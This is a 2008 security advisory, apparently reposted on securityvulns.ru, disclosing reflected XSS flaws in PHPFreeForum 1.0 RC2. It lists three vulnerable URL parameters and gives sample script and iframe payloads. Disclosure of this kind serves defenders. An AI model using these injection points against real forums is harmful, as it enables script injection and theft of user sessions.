Computer Security

Security Advisory: PHPFreeForum <= 1.0 RC2 Remote XSS Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  www file share pro 5.30 insecure multiple

  phpSQLiteCMS Multiple Remote XSS Vulnerability

  Exteen Blog XSS Remote Cookie Disclosure Exploit

  BMForum Remote 5.6 Miltiple XSS Vulnerability

From:tan_prathan_(at)_hotmail.com <tan_prathan_(at)_hotmail.com>
Date:22.05.2008
Subject:PHPFreeForum <= 1.0 RC2 Remote XSS Vulnerability

==========================================================
   PHPFreeForum <= 1.0 RC2 Remote XSS Vulnerability             
==========================================================

AUTHOR : CWH Underground
DATE   : 21 May 2008
SITE   : www.citec.us


#####################################################
APPLICATION : PHPFreeForum
VERSION     : 1.0 RC2
VENDOR      : http://downloads.sourceforge.net/phpfreeforum/  
#####################################################

---Exploit---

[-] http://[target]/[phpfreeforum_path]/html/error.php?message=<XSS>
[-] http://[target]/[phpfreeforum_path]/html/part/menu.php?nickname=<XSS>
[-] http://[target]/[phpfreeforum_path]/html/part/menu.php?randomid=<XSS>

Example for XSS :
       <script>alert(123);</script>
       <iframe src=http://www.google.com>
                                                                                 
                                     

##################################################################
Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   
##################################################################

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server